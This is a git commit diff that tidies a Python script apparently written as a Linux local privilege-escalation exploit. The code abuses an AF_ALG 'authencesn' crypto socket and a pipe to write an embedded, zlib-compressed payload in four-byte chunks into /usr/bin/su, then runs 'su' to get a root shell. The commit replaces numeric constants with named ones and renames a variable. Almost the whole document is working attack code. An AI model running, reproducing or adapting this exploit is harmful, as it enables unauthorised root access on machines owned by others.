Increasing Readability

2026-05-05 21:20:46 -06:00
parent d714a42433
commit 3d307e627b
2 changed files with 11 additions and 9 deletions
@@ -1,17 +1,17 @@
 import os, zlib, socket
 
 
-def exploit(zlib_payload, su_file, counter):
+def exploit(payload, su_file, counter):
 
-    listener = socket.socket(38, 5, 0)
+    listener = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
    listener.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
 
-    listener.setsockopt(279, 1, bytes.fromhex('0800010000000010'+'0'*64))
-    listener.setsockopt(279, 5, None, 4)
+    listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, bytes.fromhex('0800010000000010'+'0'*64))
+    listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE, None, 4)
 
    connection, _ = listener.accept()
 
-    connection.sendmsg([b"A"*4+zlib_payload], [(279, 3, b'\x00'*4), (279, 2, b'\x10'+b'\x00'*19), (279, 4, b'\x08' + b'\x00' * 3),], 32768)
+    connection.sendmsg([b"A"*4+payload], [(socket.SOL_ALG, 3, b'\x00'*4), (socket.SOL_ALG, 2, b'\x10'+b'\x00'*19), (socket.SOL_ALG, 4, b'\x08' + b'\x00' * 3),], 32768)
 
    stdin, stdout = os.pipe()
 
@@ -25,14 +25,14 @@ def exploit(zlib_payload, su_file, counter):
 
 if __name__ == "__main__":
 
-    zlib_payload = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
+    payload = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
 
    su_file = os.open("/usr/bin/su", 0)
 
    i = 0
 
-    while i < len(zlib_payload):
-        exploit(zlib_payload[i:i+4], su_file, i)
+    while i < len(payload):
+        exploit(payload[i:i+4], su_file, i)
        i += 4
 
    os.system("su")